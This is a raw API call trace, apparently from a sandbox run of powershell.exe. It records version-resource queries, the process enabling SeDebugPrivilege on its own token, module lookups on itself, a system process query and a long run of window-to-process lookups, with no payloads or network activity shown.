	[0542.875] CoTaskMemFree (pv=0x42d340) 
	[0542.876] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x0, puLen=0x26dbe0) returned 0
	[0542.876] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x0, puLen=0x26dbe0) returned 0
	[0542.876] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x0, puLen=0x26dbe0) returned 0
	[0542.876] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dbb8, puLen=0x26dbb0 | out: lplpBuffer=0x26dbb8*=0x2cc7374, puLen=0x26dbb0) returned 1
	[0542.877] CoTaskMemAlloc (cb=0x204) returned 0x3d5690
	[0542.877] VerLanguageNameW (in: wLang=0x0, szLang=0x3d5690, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0542.878] CoTaskMemFree (pv=0x3d5690) 
	[0542.878] VerQueryValueW (in: pBlock=0x2cc72d8, lpSubBlock="\\", lplpBuffer=0x26dc08, puLen=0x26dc00 | out: lplpBuffer=0x26dc08*=0x2cc7300, puLen=0x26dc00) returned 1
	[0542.884] GetCurrentProcessId () returned 0x10f8
	[0543.844] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26cb30 | out: lpLuid=0x26cb30*(LowPart=0x14, HighPart=0)) returned 1
	[0543.846] GetCurrentProcess () returned 0xffffffffffffffff
	[0543.847] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26cb50 | out: TokenHandle=0x26cb50*=0x2e8) returned 1
	[0543.848] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x2ccab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0543.849] CloseHandle (hObject=0x2e8) returned 1
	[0543.854] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10f8) returned 0x2e8
	[0543.862] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x2ccabb8, cb=0x200, lpcbNeeded=0x26db68 | out: lphModule=0x2ccabb8, lpcbNeeded=0x26db68) returned 1
	[0543.864] GetModuleInformation (in: hProcess=0x2e8, hModule=0x13f370000, lpmodinfo=0x2ccae28, cb=0x18 | out: lpmodinfo=0x2ccae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0543.866] CoTaskMemAlloc (cb=0x804) returned 0x43aa70
	[0543.866] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x13f370000, lpBaseName=0x43aa70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0543.866] CoTaskMemFree (pv=0x43aa70) 
	[0543.867] CoTaskMemAlloc (cb=0x804) returned 0x43aa70
	[0543.867] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x13f370000, lpFilename=0x43aa70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0543.867] CoTaskMemFree (pv=0x43aa70) 
	[0543.868] CloseHandle (hObject=0x2e8) returned 1
	[0543.875] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x10f8) returned 0x2e8
	[0543.876] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x26dc98 | out: lpExitCode=0x26dc98*=0x103) returned 1
	[0545.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ccb088, Length=0x20000, ResultLength=0x26dc60 | out: SystemInformation=0x12ccb088, ResultLength=0x26dc60*=0x325e8) returned 0xc0000004
	[0545.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12ceb0b8, Length=0x34de8, ResultLength=0x26dc60 | out: SystemInformation=0x12ceb0b8, ResultLength=0x26dc60*=0x325e8) returned 0x0
	[0545.067] EnumWindows (lpEnumFunc=0x2b966ac, lParam=0x0) returned 1
	[0550.356] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x558
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x538
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x778
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x778
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.357] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4d0
	[0550.358] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x19a8
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1944
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x18c8
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x18ac
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x18ec
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1898
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc98
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x153c
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1808
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12a4
	[0550.359] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1740
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16c4
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1820
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16ac
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1858
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1664
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10b4
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10ac
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10ec
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1068
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x17e0
	[0550.360] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x102c
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x17a4
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1050
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1694
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1770
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1720
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x165c
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1578
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x16c0
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x161c
	[0550.361] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1638
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x15c8
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1554
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1674
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1520
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x14bc
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf8c
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe9c
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1434
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x14ec
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xfcc
	[0550.362] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12ac
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1484
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x934
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc0c
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb08
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x948
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1178
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13e0
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xcd0
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x13fc
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdc8
	[0550.363] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc18
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc2c
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa1c
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1244
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdb0
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1398
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1358
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1370
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1340
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x130c
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12c0
	[0550.364] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x12e4
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1270
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1298
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x120c
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x122c
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11c4
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x11b0
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1188
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1148
	[0550.365] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1160
	[0550.366] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x10fc
	[0550.366] GetWindow (hWnd=0x30272, uCmd=0x4) returned 0x0
	[0550.367] IsWindowVisible (hWnd=0x30272) returned 0
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe34
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xea4
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x514
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe48
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbc8
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdf8
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x318
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xcac
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x8bc
	[0550.368] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf9c
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf48
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe40
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xecc
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xeb8
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe80
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe98
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe60
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xee4
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xf00
	[0550.369] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdf0
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xe1c
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xdd0
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd94
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd74
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xd00
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xcd8
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc84
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xca4
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc64
	[0550.370] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xc24
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb84
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xbac
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x384
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xab8
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x33c
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa44
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa64
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x8a8
	[0550.371] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xaf0
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x88c
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb04
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x910
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x230
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xac0
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xab4
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xaac
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x3d0
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x978
	[0550.372] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa7c
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x59c
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa88
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa6c
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa68
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x9f8
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xa04
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x924
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x8dc
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7dc
	[0550.373] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x768
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x764
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x820
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x810
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x794
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x83c
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7ac
	[0550.374] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb44
